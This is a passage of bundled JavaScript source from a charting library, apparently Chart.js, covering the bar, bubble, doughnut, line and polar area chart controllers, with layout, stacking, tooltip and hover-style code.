if (xScale.options.stacked) {
var chart = me.chart;
var datasets = chart.data.datasets;
var value = Number(datasets[datasetIndex].data[index]);
for (var i = 0; i < datasetIndex; i++) {
var currentDs = datasets[i];
var currentDsMeta = chart.getDatasetMeta(i);
if (currentDsMeta.bar && currentDsMeta.xAxisID === xScale.id && chart.isDatasetVisible(i)) {
var currentVal = Number(currentDs.data[index]);
base += value < 0 ? Math.min(currentVal, 0) : Math.max(currentVal, 0);
}
}
return xScale.getPixelForValue(base);
}
return xScale.getBasePixel();
},
getRuler: function (index) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var datasetCount = me.getBarCount();
var tickHeight;
if (yScale.options.type === 'category') {
tickHeight = yScale.getPixelForTick(index + 1) - yScale.getPixelForTick(index);
} else {
// Average width
tickHeight = yScale.width / yScale.ticks.length;
}
var categoryHeight = tickHeight * yScale.options.categoryPercentage;
var categorySpacing = (tickHeight - (tickHeight * yScale.options.categoryPercentage)) / 2;
var fullBarHeight = categoryHeight / datasetCount;
if (yScale.ticks.length !== me.chart.data.labels.length) {
var perc = yScale.ticks.length / me.chart.data.labels.length;
fullBarHeight = fullBarHeight * perc;
}
var barHeight = fullBarHeight * yScale.options.barPercentage;
var barSpacing = fullBarHeight - (fullBarHeight * yScale.options.barPercentage);
return {
datasetCount: datasetCount,
tickHeight: tickHeight,
categoryHeight: categoryHeight,
categorySpacing: categorySpacing,
fullBarHeight: fullBarHeight,
barHeight: barHeight,
barSpacing: barSpacing
};
},
calculateBarHeight: function (ruler) {
var me = this;
var yScale = me.getScaleForId(me.getMeta().yAxisID);
if (yScale.options.barThickness) {
return yScale.options.barThickness;
}
return yScale.options.stacked ? ruler.categoryHeight : ruler.barHeight;
},
calculateBarX: function (index, datasetIndex) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var value = Number(me.getDataset().data[index]);
if (xScale.options.stacked) {
var sumPos = 0,
sumNeg = 0;
for (var i = 0; i < datasetIndex; i++) {
var ds = me.chart.data.datasets[i];
var dsMeta = me.chart.getDatasetMeta(i);
if (dsMeta.bar && dsMeta.xAxisID === xScale.id && me.chart.isDatasetVisible(i)) {
var stackedVal = Number(ds.data[index]);
if (stackedVal < 0) {
sumNeg += stackedVal || 0;
} else {
sumPos += stackedVal || 0;
}
}
}
if (value < 0) {
return xScale.getPixelForValue(sumNeg + value);
}
return xScale.getPixelForValue(sumPos + value);
}
return xScale.getPixelForValue(value);
},
calculateBarY: function (index, datasetIndex, ruler) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var barIndex = me.getBarIndex(datasetIndex);
var topTick = yScale.getPixelForValue(null, index, datasetIndex, me.chart.isCombo);
topTick -= me.chart.isCombo ? (ruler.tickHeight / 2) : 0;
if (yScale.options.stacked) {
return topTick + (ruler.categoryHeight / 2) + ruler.categorySpacing;
}
return topTick +
(ruler.barHeight / 2) +
ruler.categorySpacing +
(ruler.barHeight * barIndex) +
(ruler.barSpacing / 2) +
(ruler.barSpacing * barIndex);
}
});
};
}, {}], 16: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.bubble = {
hover: {
mode: 'single'
},
scales: {
xAxes: [{
type: 'linear', // bubble should probably use a linear scale by default
position: 'bottom',
id: 'x-axis-0' // need an ID so datasets can reference the scale
}],
yAxes: [{
type: 'linear',
position: 'left',
id: 'y-axis-0'
}]
},
tooltips: {
callbacks: {
title: function () {
// Title doesn't make sense for bubble since we format the data as a point
return '';
},
label: function (tooltipItem, data) {
var datasetLabel = data.datasets[tooltipItem.datasetIndex].label || '';
var dataPoint = data.datasets[tooltipItem.datasetIndex].data[tooltipItem.index];
return datasetLabel + ': (' + tooltipItem.xLabel + ', ' + tooltipItem.yLabel + ', ' + dataPoint.r + ')';
}
}
}
};
Chart.controllers.bubble = Chart.DatasetController.extend({
dataElementType: Chart.elements.Point,
update: function (reset) {
var me = this;
var meta = me.getMeta();
var points = meta.data;
// Update Points
helpers.each(points, function (point, index) {
me.updateElement(point, index, reset);
});
},
updateElement: function (point, index, reset) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var yScale = me.getScaleForId(meta.yAxisID);
var custom = point.custom || {};
var dataset = me.getDataset();
var data = dataset.data[index];
var pointElementOptions = me.chart.options.elements.point;
var dsIndex = me.index;
helpers.extend(point, {
// Utility
_xScale: xScale,
_yScale: yScale,
_datasetIndex: dsIndex,
_index: index,
// Desired view properties
_model: {
x: reset ? xScale.getPixelForDecimal(0.5) : xScale.getPixelForValue(typeof data === 'object' ? data : NaN, index, dsIndex, me.chart.isCombo),
y: reset ? yScale.getBasePixel() : yScale.getPixelForValue(data, index, dsIndex),
// Appearance
radius: reset ? 0 : custom.radius ? custom.radius : me.getRadius(data),
// Tooltip
hitRadius: custom.hitRadius ? custom.hitRadius : helpers.getValueAtIndexOrDefault(dataset.hitRadius, index, pointElementOptions.hitRadius)
}
});
// Trick to reset the styles of the point
Chart.DatasetController.prototype.removeHoverStyle.call(me, point, pointElementOptions);
var model = point._model;
model.skip = custom.skip ? custom.skip : (isNaN(model.x) || isNaN(model.y));
point.pivot();
},
getRadius: function (value) {
return value.r || this.chart.options.elements.point.radius;
},
setHoverStyle: function (point) {
var me = this;
Chart.DatasetController.prototype.setHoverStyle.call(me, point);
// Radius
var dataset = me.chart.data.datasets[point._datasetIndex];
var index = point._index;
var custom = point.custom || {};
var model = point._model;
model.radius = custom.hoverRadius ? custom.hoverRadius : (helpers.getValueAtIndexOrDefault(dataset.hoverRadius, index, me.chart.options.elements.point.hoverRadius)) + me.getRadius(dataset.data[index]);
},
removeHoverStyle: function (point) {
var me = this;
Chart.DatasetController.prototype.removeHoverStyle.call(me, point, me.chart.options.elements.point);
var dataVal = me.chart.data.datasets[point._datasetIndex].data[point._index];
var custom = point.custom || {};
var model = point._model;
model.radius = custom.radius ? custom.radius : me.getRadius(dataVal);
}
});
};
}, {}], 17: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
defaults = Chart.defaults;
defaults.doughnut = {
animation: {
// Boolean - Whether we animate the rotation of the Doughnut
animateRotate: true,
// Boolean - Whether we animate scaling the Doughnut from the centre
animateScale: false
},
aspectRatio: 1,
hover: {
mode: 'single'
},
legendCallback: function (chart) {
var text = [];
text.push('<ul class="' + chart.id + '-legend">');
var data = chart.data;
var datasets = data.datasets;
var labels = data.labels;
if (datasets.length) {
for (var i = 0; i < datasets[0].data.length; ++i) {
text.push('<li><span style="background-color:' + datasets[0].backgroundColor[i] + '"></span>');
if (labels[i]) {
text.push(labels[i]);
}
text.push('</li>');
}
}
text.push('</ul>');
return text.join('');
},
legend: {
labels: {
generateLabels: function (chart) {
var data = chart.data;
if (data.labels.length && data.datasets.length) {
return data.labels.map(function (label, i) {
var meta = chart.getDatasetMeta(0);
var ds = data.datasets[0];
var arc = meta.data[i];
var custom = arc && arc.custom || {};
var getValueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
var arcOpts = chart.options.elements.arc;
var fill = custom.backgroundColor ? custom.backgroundColor : getValueAtIndexOrDefault(ds.backgroundColor, i, arcOpts.backgroundColor);
var stroke = custom.borderColor ? custom.borderColor : getValueAtIndexOrDefault(ds.borderColor, i, arcOpts.borderColor);
var bw = custom.borderWidth ? custom.borderWidth : getValueAtIndexOrDefault(ds.borderWidth, i, arcOpts.borderWidth);
return {
text: label,
fillStyle: fill,
strokeStyle: stroke,
lineWidth: bw,
hidden: isNaN(ds.data[i]) || meta.data[i].hidden,
// Extra data used for toggling the correct item
index: i
};
});
}
return [];
}
},
onClick: function (e, legendItem) {
var index = legendItem.index;
var chart = this.chart;
var i, ilen, meta;
for (i = 0, ilen = (chart.data.datasets || []).length; i < ilen; ++i) {
meta = chart.getDatasetMeta(i);
// toggle visibility of index if exists
if (meta.data[index]) {
meta.data[index].hidden = !meta.data[index].hidden;
}
}
chart.update();
}
},
// The percentage of the chart that we cut out of the middle.
cutoutPercentage: 50,
// The rotation of the chart, where the first data arc begins.
rotation: Math.PI * -0.5,
// The total circumference of the chart.
circumference: Math.PI * 2.0,
// Need to override these to give a nice default
tooltips: {
callbacks: {
title: function () {
return '';
},
label: function (tooltipItem, data) {
var dataLabel = data.labels[tooltipItem.index];
var value = ': ' + data.datasets[tooltipItem.datasetIndex].data[tooltipItem.index];
if (helpers.isArray(dataLabel)) {
// show value on first line of multiline label
// need to clone because we are changing the value
dataLabel = dataLabel.slice();
dataLabel[0] += value;
} else {
dataLabel += value;
}
return dataLabel;
}
}
}
};
defaults.pie = helpers.clone(defaults.doughnut);
helpers.extend(defaults.pie, {
cutoutPercentage: 0
});
Chart.controllers.doughnut = Chart.controllers.pie = Chart.DatasetController.extend({
dataElementType: Chart.elements.Arc,
linkScales: helpers.noop,
// Get index of the dataset in relation to the visible datasets. This allows determining the inner and outer radius correctly
getRingIndex: function (datasetIndex) {
var ringIndex = 0;
for (var j = 0; j < datasetIndex; ++j) {
if (this.chart.isDatasetVisible(j)) {
++ringIndex;
}
}
return ringIndex;
},
update: function (reset) {
var me = this;
var chart = me.chart,
chartArea = chart.chartArea,
opts = chart.options,
arcOpts = opts.elements.arc,
availableWidth = chartArea.right - chartArea.left - arcOpts.borderWidth,
availableHeight = chartArea.bottom - chartArea.top - arcOpts.borderWidth,
minSize = Math.min(availableWidth, availableHeight),
offset = {
x: 0,
y: 0
},
meta = me.getMeta(),
cutoutPercentage = opts.cutoutPercentage,
circumference = opts.circumference;
// If the chart's circumference isn't a full circle, calculate minSize as a ratio of the width/height of the arc
if (circumference < Math.PI * 2.0) {
var startAngle = opts.rotation % (Math.PI * 2.0);
startAngle += Math.PI * 2.0 * (startAngle >= Math.PI ? -1 : startAngle < -Math.PI ? 1 : 0);
var endAngle = startAngle + circumference;
var start = {x: Math.cos(startAngle), y: Math.sin(startAngle)};
var end = {x: Math.cos(endAngle), y: Math.sin(endAngle)};
var contains0 = (startAngle <= 0 && 0 <= endAngle) || (startAngle <= Math.PI * 2.0 && Math.PI * 2.0 <= endAngle);
var contains90 = (startAngle <= Math.PI * 0.5 && Math.PI * 0.5 <= endAngle) || (startAngle <= Math.PI * 2.5 && Math.PI * 2.5 <= endAngle);
var contains180 = (startAngle <= -Math.PI && -Math.PI <= endAngle) || (startAngle <= Math.PI && Math.PI <= endAngle);
var contains270 = (startAngle <= -Math.PI * 0.5 && -Math.PI * 0.5 <= endAngle) || (startAngle <= Math.PI * 1.5 && Math.PI * 1.5 <= endAngle);
var cutout = cutoutPercentage / 100.0;
var min = {
x: contains180 ? -1 : Math.min(start.x * (start.x < 0 ? 1 : cutout), end.x * (end.x < 0 ? 1 : cutout)),
y: contains270 ? -1 : Math.min(start.y * (start.y < 0 ? 1 : cutout), end.y * (end.y < 0 ? 1 : cutout))
};
var max = {
x: contains0 ? 1 : Math.max(start.x * (start.x > 0 ? 1 : cutout), end.x * (end.x > 0 ? 1 : cutout)),
y: contains90 ? 1 : Math.max(start.y * (start.y > 0 ? 1 : cutout), end.y * (end.y > 0 ? 1 : cutout))
};
var size = {width: (max.x - min.x) * 0.5, height: (max.y - min.y) * 0.5};
minSize = Math.min(availableWidth / size.width, availableHeight / size.height);
offset = {x: (max.x + min.x) * -0.5, y: (max.y + min.y) * -0.5};
}
chart.borderWidth = me.getMaxBorderWidth(meta.data);
chart.outerRadius = Math.max((minSize - chart.borderWidth) / 2, 0);
chart.innerRadius = Math.max(cutoutPercentage ? (chart.outerRadius / 100) * (cutoutPercentage) : 1, 0);
chart.radiusLength = (chart.outerRadius - chart.innerRadius) / chart.getVisibleDatasetCount();
chart.offsetX = offset.x * chart.outerRadius;
chart.offsetY = offset.y * chart.outerRadius;
meta.total = me.calculateTotal();
me.outerRadius = chart.outerRadius - (chart.radiusLength * me.getRingIndex(me.index));
me.innerRadius = me.outerRadius - chart.radiusLength;
helpers.each(meta.data, function (arc, index) {
me.updateElement(arc, index, reset);
});
},
updateElement: function (arc, index, reset) {
var me = this;
var chart = me.chart,
chartArea = chart.chartArea,
opts = chart.options,
animationOpts = opts.animation,
centerX = (chartArea.left + chartArea.right) / 2,
centerY = (chartArea.top + chartArea.bottom) / 2,
startAngle = opts.rotation, // non reset case handled later
endAngle = opts.rotation, // non reset case handled later
dataset = me.getDataset(),
circumference = reset && animationOpts.animateRotate ? 0 : arc.hidden ? 0 : me.calculateCircumference(dataset.data[index]) * (opts.circumference / (2.0 * Math.PI)),
innerRadius = reset && animationOpts.animateScale ? 0 : me.innerRadius,
outerRadius = reset && animationOpts.animateScale ? 0 : me.outerRadius,
valueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
helpers.extend(arc, {
// Utility
_datasetIndex: me.index,
_index: index,
// Desired view properties
_model: {
x: centerX + chart.offsetX,
y: centerY + chart.offsetY,
startAngle: startAngle,
endAngle: endAngle,
circumference: circumference,
outerRadius: outerRadius,
innerRadius: innerRadius,
label: valueAtIndexOrDefault(dataset.label, index, chart.data.labels[index])
}
});
var model = arc._model;
// Resets the visual styles
this.removeHoverStyle(arc);
// Set correct angles if not resetting
if (!reset || !animationOpts.animateRotate) {
if (index === 0) {
model.startAngle = opts.rotation;
} else {
model.startAngle = me.getMeta().data[index - 1]._model.endAngle;
}
model.endAngle = model.startAngle + model.circumference;
}
arc.pivot();
},
removeHoverStyle: function (arc) {
Chart.DatasetController.prototype.removeHoverStyle.call(this, arc, this.chart.options.elements.arc);
},
calculateTotal: function () {
var dataset = this.getDataset();
var meta = this.getMeta();
var total = 0;
var value;
helpers.each(meta.data, function (element, index) {
value = dataset.data[index];
if (!isNaN(value) && !element.hidden) {
total += Math.abs(value);
}
});
/* if (total === 0) {
total = NaN;
}*/
return total;
},
calculateCircumference: function (value) {
var total = this.getMeta().total;
if (total > 0 && !isNaN(value)) {
return (Math.PI * 2.0) * (value / total);
}
return 0;
},
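// E.g. a value of 25 out of a total of 100 spans (2 * PI) * 0.25 = PI / 2,
// a quarter circle (updateElement then scales this by options.circumference).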
// gets the max border or hover width to properly scale pie charts
getMaxBorderWidth: function (elements) {
var max = 0,
index = this.index,
length = elements.length,
borderWidth,
hoverWidth;
for (var i = 0; i < length; i++) {
borderWidth = elements[i]._model ? elements[i]._model.borderWidth : 0;
hoverWidth = elements[i]._chart ? elements[i]._chart.config.data.datasets[index].hoverBorderWidth : 0;
max = borderWidth > max ? borderWidth : max;
max = hoverWidth > max ? hoverWidth : max;
}
return max;
}
});
};
}, {}], 18: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.line = {
showLines: true,
spanGaps: false,
hover: {
mode: 'label'
},
scales: {
xAxes: [{
type: 'category',
id: 'x-axis-0'
}],
yAxes: [{
type: 'linear',
id: 'y-axis-0'
}]
}
};
function lineEnabled(dataset, options) {
return helpers.getValueOrDefault(dataset.showLine, options.showLines);
}
Chart.controllers.line = Chart.DatasetController.extend({
datasetElementType: Chart.elements.Line,
dataElementType: Chart.elements.Point,
update: function (reset) {
var me = this;
var meta = me.getMeta();
var line = meta.dataset;
var points = meta.data || [];
var options = me.chart.options;
var lineElementOptions = options.elements.line;
var scale = me.getScaleForId(meta.yAxisID);
var i, ilen, custom;
var dataset = me.getDataset();
var showLine = lineEnabled(dataset, options);
// Update Line
if (showLine) {
custom = line.custom || {};
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.tension !== undefined) && (dataset.lineTension === undefined)) {
dataset.lineTension = dataset.tension;
}
// Utility
line._scale = scale;
line._datasetIndex = me.index;
// Data
line._children = points;
// Model
line._model = {
// Appearance
// The default behavior of lines is to break at null values, according
// to https://github.com/chartjs/Chart.js/issues/2435#issuecomment-216718158
// This option gives lines the ability to span gaps
spanGaps: dataset.spanGaps ? dataset.spanGaps : options.spanGaps,
tension: custom.tension ? custom.tension : helpers.getValueOrDefault(dataset.lineTension, lineElementOptions.tension),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : (dataset.backgroundColor || lineElementOptions.backgroundColor),
borderWidth: custom.borderWidth ? custom.borderWidth : (dataset.borderWidth || lineElementOptions.borderWidth),
borderColor: custom.borderColor ? custom.borderColor : (dataset.borderColor || lineElementOptions.borderColor),
borderCapStyle: custom.borderCapStyle ? custom.borderCapStyle : (dataset.borderCapStyle || lineElementOptions.borderCapStyle),
borderDash: custom.borderDash ? custom.borderDash : (dataset.borderDash || lineElementOptions.borderDash),
borderDashOffset: custom.borderDashOffset ? custom.borderDashOffset : (dataset.borderDashOffset || lineElementOptions.borderDashOffset),
borderJoinStyle: custom.borderJoinStyle ? custom.borderJoinStyle : (dataset.borderJoinStyle || lineElementOptions.borderJoinStyle),
fill: custom.fill ? custom.fill : (dataset.fill !== undefined ? dataset.fill : lineElementOptions.fill),
steppedLine: custom.steppedLine ? custom.steppedLine : helpers.getValueOrDefault(dataset.steppedLine, lineElementOptions.stepped),
cubicInterpolationMode: custom.cubicInterpolationMode ? custom.cubicInterpolationMode : helpers.getValueOrDefault(dataset.cubicInterpolationMode, lineElementOptions.cubicInterpolationMode),
// Scale
scaleTop: scale.top,
scaleBottom: scale.bottom,
scaleZero: scale.getBasePixel()
};
line.pivot();
}
// Update Points
for (i = 0, ilen = points.length; i < ilen; ++i) {
me.updateElement(points[i], i, reset);
}
if (showLine && line._model.tension !== 0) {
me.updateBezierControlPoints();
}
// Now pivot the point for animation
for (i = 0, ilen = points.length; i < ilen; ++i) {
points[i].pivot();
}
},
getPointBackgroundColor: function (point, index) {
var backgroundColor = this.chart.options.elements.point.backgroundColor;
var dataset = this.getDataset();
var custom = point.custom || {};
if (custom.backgroundColor) {
backgroundColor = custom.backgroundColor;
} else if (dataset.pointBackgroundColor) {
backgroundColor = helpers.getValueAtIndexOrDefault(dataset.pointBackgroundColor, index, backgroundColor);
} else if (dataset.backgroundColor) {
backgroundColor = dataset.backgroundColor;
}
return backgroundColor;
},
getPointBorderColor: function (point, index) {
var borderColor = this.chart.options.elements.point.borderColor;
var dataset = this.getDataset();
var custom = point.custom || {};
if (custom.borderColor) {
borderColor = custom.borderColor;
} else if (dataset.pointBorderColor) {
borderColor = helpers.getValueAtIndexOrDefault(dataset.pointBorderColor, index, borderColor);
} else if (dataset.borderColor) {
borderColor = dataset.borderColor;
}
return borderColor;
},
getPointBorderWidth: function (point, index) {
var borderWidth = this.chart.options.elements.point.borderWidth;
var dataset = this.getDataset();
var custom = point.custom || {};
if (custom.borderWidth) {
borderWidth = custom.borderWidth;
} else if (dataset.pointBorderWidth) {
borderWidth = helpers.getValueAtIndexOrDefault(dataset.pointBorderWidth, index, borderWidth);
} else if (dataset.borderWidth) {
borderWidth = dataset.borderWidth;
}
return borderWidth;
},
updateElement: function (point, index, reset) {
var me = this;
var meta = me.getMeta();
var custom = point.custom || {};
var dataset = me.getDataset();
var datasetIndex = me.index;
var value = dataset.data[index];
var yScale = me.getScaleForId(meta.yAxisID);
var xScale = me.getScaleForId(meta.xAxisID);
var pointOptions = me.chart.options.elements.point;
var x, y;
var labels = me.chart.data.labels || [];
var includeOffset = (labels.length === 1 || dataset.data.length === 1) || me.chart.isCombo;
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.radius !== undefined) && (dataset.pointRadius === undefined)) {
dataset.pointRadius = dataset.radius;
}
if ((dataset.hitRadius !== undefined) && (dataset.pointHitRadius === undefined)) {
dataset.pointHitRadius = dataset.hitRadius;
}
x = xScale.getPixelForValue(typeof value === 'object' ? value : NaN, index, datasetIndex, includeOffset);
y = reset ? yScale.getBasePixel() : me.calculatePointY(value, index, datasetIndex);
// Utility
point._xScale = xScale;
point._yScale = yScale;
point._datasetIndex = datasetIndex;
point._index = index;
// Desired view properties
point._model = {
x: x,
y: y,
skip: custom.skip || isNaN(x) || isNaN(y),
// Appearance
radius: custom.radius || helpers.getValueAtIndexOrDefault(dataset.pointRadius, index, pointOptions.radius),
pointStyle: custom.pointStyle || helpers.getValueAtIndexOrDefault(dataset.pointStyle, index, pointOptions.pointStyle),
backgroundColor: me.getPointBackgroundColor(point, index),
borderColor: me.getPointBorderColor(point, index),
borderWidth: me.getPointBorderWidth(point, index),
tension: meta.dataset._model ? meta.dataset._model.tension : 0,
steppedLine: meta.dataset._model ? meta.dataset._model.steppedLine : false,
// Tooltip
hitRadius: custom.hitRadius || helpers.getValueAtIndexOrDefault(dataset.pointHitRadius, index, pointOptions.hitRadius)
};
},
calculatePointY: function (value, index, datasetIndex) {
var me = this;
var chart = me.chart;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var sumPos = 0;
var sumNeg = 0;
var i, ds, dsMeta;
if (yScale.options.stacked) {
for (i = 0; i < datasetIndex; i++) {
ds = chart.data.datasets[i];
dsMeta = chart.getDatasetMeta(i);
if (dsMeta.type === 'line' && dsMeta.yAxisID === yScale.id && chart.isDatasetVisible(i)) {
var stackedRightValue = Number(yScale.getRightValue(ds.data[index]));
if (stackedRightValue < 0) {
sumNeg += stackedRightValue || 0;
} else {
sumPos += stackedRightValue || 0;
}
}
}
var rightValue = Number(yScale.getRightValue(value));
if (rightValue < 0) {
return yScale.getPixelForValue(sumNeg + rightValue);
}
return yScale.getPixelForValue(sumPos + rightValue);
}
return yScale.getPixelForValue(value);
},
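// Worked example (illustrative): with a stacked y-axis and three visible line
// datasets whose values at `index` are 5, -2 and 4, calculatePointY for the
// third dataset sees sumPos = 5 and sumNeg = -2 from the datasets before it;
// its own value 4 is non-negative, so the returned pixel corresponds to
// sumPos + 4 = 9 on the scale.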
updateBezierControlPoints: function () {
var me = this;
var meta = me.getMeta();
var area = me.chart.chartArea;
var points = (meta.data || []);
var i, ilen, point, model, controlPoints;
// Only consider points that are drawn in case the spanGaps option is used
if (meta.dataset._model.spanGaps) {
points = points.filter(function (pt) {
return !pt._model.skip;
});
}
function capControlPoint(pt, min, max) {
return Math.max(Math.min(pt, max), min);
}
if (meta.dataset._model.cubicInterpolationMode === 'monotone') {
helpers.splineCurveMonotone(points);
} else {
for (i = 0, ilen = points.length; i < ilen; ++i) {
point = points[i];
model = point._model;
controlPoints = helpers.splineCurve(
helpers.previousItem(points, i)._model,
model,
helpers.nextItem(points, i)._model,
meta.dataset._model.tension
);
model.controlPointPreviousX = controlPoints.previous.x;
model.controlPointPreviousY = controlPoints.previous.y;
model.controlPointNextX = controlPoints.next.x;
model.controlPointNextY = controlPoints.next.y;
}
}
if (me.chart.options.elements.line.capBezierPoints) {
for (i = 0, ilen = points.length; i < ilen; ++i) {
model = points[i]._model;
model.controlPointPreviousX = capControlPoint(model.controlPointPreviousX, area.left, area.right);
model.controlPointPreviousY = capControlPoint(model.controlPointPreviousY, area.top, area.bottom);
model.controlPointNextX = capControlPoint(model.controlPointNextX, area.left, area.right);
model.controlPointNextY = capControlPoint(model.controlPointNextY, area.top, area.bottom);
}
}
},
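// Example (illustrative): capControlPoint(512, area.left = 0, area.right = 480)
// returns 480, clamping a control point that the spline computed outside the
// chart area so the bezier curve never draws beyond the visible bounds.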
draw: function (ease) {
var me = this;
var meta = me.getMeta();
var points = meta.data || [];
var easingDecimal = ease || 1;
var i, ilen;
// Transition Point Locations
for (i = 0, ilen = points.length; i < ilen; ++i) {
points[i].transition(easingDecimal);
}
// Transition and Draw the line
if (lineEnabled(me.getDataset(), me.chart.options)) {
meta.dataset.transition(easingDecimal).draw();
}
// Draw the points
for (i = 0, ilen = points.length; i < ilen; ++i) {
points[i].draw();
}
},
setHoverStyle: function (point) {
// Point
var dataset = this.chart.data.datasets[point._datasetIndex];
var index = point._index;
var custom = point.custom || {};
var model = point._model;
model.radius = custom.hoverRadius || helpers.getValueAtIndexOrDefault(dataset.pointHoverRadius, index, this.chart.options.elements.point.hoverRadius);
model.backgroundColor = custom.hoverBackgroundColor || helpers.getValueAtIndexOrDefault(dataset.pointHoverBackgroundColor, index, helpers.getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor || helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderColor, index, helpers.getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth || helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderWidth, index, model.borderWidth);
},
removeHoverStyle: function (point) {
var me = this;
var dataset = me.chart.data.datasets[point._datasetIndex];
var index = point._index;
var custom = point.custom || {};
var model = point._model;
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.radius !== undefined) && (dataset.pointRadius === undefined)) {
dataset.pointRadius = dataset.radius;
}
model.radius = custom.radius || helpers.getValueAtIndexOrDefault(dataset.pointRadius, index, me.chart.options.elements.point.radius);
model.backgroundColor = me.getPointBackgroundColor(point, index);
model.borderColor = me.getPointBorderColor(point, index);
model.borderWidth = me.getPointBorderWidth(point, index);
}
});
};
}, {}], 19: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.polarArea = {
scale: {
type: 'radialLinear',
lineArc: true, // so that lines are circular
ticks: {
beginAtZero: true
}
},
// Boolean - Whether to animate the rotation of the chart
animation: {
animateRotate: true,
animateScale: true
},
startAngle: -0.5 * Math.PI,
aspectRatio: 1,
legendCallback: function (chart) {
var text = [];
text.push('<ul class="' + chart.id + '-legend">');
var data = chart.data;
var datasets = data.datasets;
var labels = data.labels;
if (datasets.length) {
for (var i = 0; i < datasets[0].data.length; ++i) {
text.push('<li><span style="background-color:' + datasets[0].backgroundColor[i] + '"></span>');
if (labels[i]) {
text.push(labels[i]);
}
text.push('</li>');
}
}
text.push('</ul>');
return text.join('');
},
legend: {
labels: {
generateLabels: function (chart) {
var data = chart.data;
if (data.labels.length && data.datasets.length) {
return data.labels.map(function (label, i) {
var meta = chart.getDatasetMeta(0);
var ds = data.datasets[0];
var arc = meta.data[i];
var custom = arc.custom || {};
var getValueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
var arcOpts = chart.options.elements.arc;
var fill = custom.backgroundColor ? custom.backgroundColor : getValueAtIndexOrDefault(ds.backgroundColor, i, arcOpts.backgroundColor);
var stroke = custom.borderColor ? custom.borderColor : getValueAtIndexOrDefault(ds.borderColor, i, arcOpts.borderColor);
var bw = custom.borderWidth ? custom.borderWidth : getValueAtIndexOrDefault(ds.borderWidth, i, arcOpts.borderWidth);
return {
text: label,
fillStyle: fill,
strokeStyle: stroke,
lineWidth: bw,
hidden: isNaN(ds.data[i]) || meta.data[i].hidden,
// Extra data used for toggling the correct item
index: i
};
});
}
return [];
}
},
onClick: function (e, legendItem) {
var index = legendItem.index;
var chart = this.chart;
var i, ilen, meta;
for (i = 0, ilen = (chart.data.datasets || []).length; i < ilen; ++i) {
meta = chart.getDatasetMeta(i);
meta.data[index].hidden = !meta.data[index].hidden;
}
chart.update();
}
},
// Need to override these to give a nice default
tooltips: {
callbacks: {
title: function () {
return '';
},
label: function (tooltipItem, data) {
return data.labels[tooltipItem.index] + ': ' + tooltipItem.yLabel;
}
}
}
};
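// Example (illustrative, not part of the library): a minimal polar area chart
// using the defaults above. Assumes a <canvas id="polar"> exists.
//
// var chart = new Chart(document.getElementById('polar').getContext('2d'), {
//     type: 'polarArea',
//     data: {
//         labels: ['A', 'B', 'C'],
//         datasets: [{data: [11, 16, 7], backgroundColor: ['#f00', '#0f0', '#00f']}]
//     }
// });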
Chart.controllers.polarArea = Chart.DatasetController.extend({
dataElementType: Chart.elements.Arc,
linkScales: helpers.noop,
update: function (reset) {
var me = this;
var chart = me.chart;
var chartArea = chart.chartArea;
var meta = me.getMeta();
var opts = chart.options;
var arcOpts = opts.elements.arc;
var minSize = Math.min(chartArea.right - chartArea.left, chartArea.bottom - chartArea.top);
chart.outerRadius = Math.max((minSize - arcOpts.borderWidth / 2) / 2, 0);
chart.innerRadius = Math.max(opts.cutoutPercentage ? (chart.outerRadius / 100) * (opts.cutoutPercentage) : 1, 0);
chart.radiusLength = (chart.outerRadius - chart.innerRadius) / chart.getVisibleDatasetCount();
me.outerRadius = chart.outerRadius - (chart.radiusLength * me.index);
me.innerRadius = me.outerRadius - chart.radiusLength;
meta.count = me.countVisibleElements();
helpers.each(meta.data, function (arc, index) {
me.updateElement(arc, index, reset);
});
},
updateElement: function (arc, index, reset) {
var me = this;
var chart = me.chart;
var dataset = me.getDataset();
var opts = chart.options;
var animationOpts = opts.animation;
var scale = chart.scale;
var getValueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
var labels = chart.data.labels;
var circumference = me.calculateCircumference(dataset.data[index]);
var centerX = scale.xCenter;
var centerY = scale.yCenter;
// If there is NaN data before us, we need to calculate the starting angle correctly.
// We could be way more efficient here, but it's unlikely that the polar area chart will have a lot of data
var visibleCount = 0;
var meta = me.getMeta();
for (var i = 0; i < index; ++i) {
if (!isNaN(dataset.data[i]) && !meta.data[i].hidden) {
++visibleCount;
}
}
var datasetStartAngle = opts.startAngle;
var distance = arc.hidden ? 0 : scale.getDistanceFromCenterForValue(dataset.data[index]);
var startAngle = datasetStartAngle + (circumference * visibleCount);
var endAngle = startAngle + (arc.hidden ? 0 : circumference);
var resetRadius = animationOpts.animateScale ? 0 : scale.getDistanceFromCenterForValue(dataset.data[index]);
helpers.extend(arc, {
// Utility
_datasetIndex: me.index,
_index: index,
_scale: scale,
// Desired view properties
_model: {
x: centerX,
y: centerY,
innerRadius: 0,
outerRadius: reset ? resetRadius : distance,
startAngle: reset && animationOpts.animateRotate ? datasetStartAngle : startAngle,
endAngle: reset && animationOpts.animateRotate ? datasetStartAngle : endAngle,
label: getValueAtIndexOrDefault(labels, index, labels[index])
}
});
// Apply border and fill style
me.removeHoverStyle(arc);
arc.pivot();
},
removeHoverStyle: function (arc) {
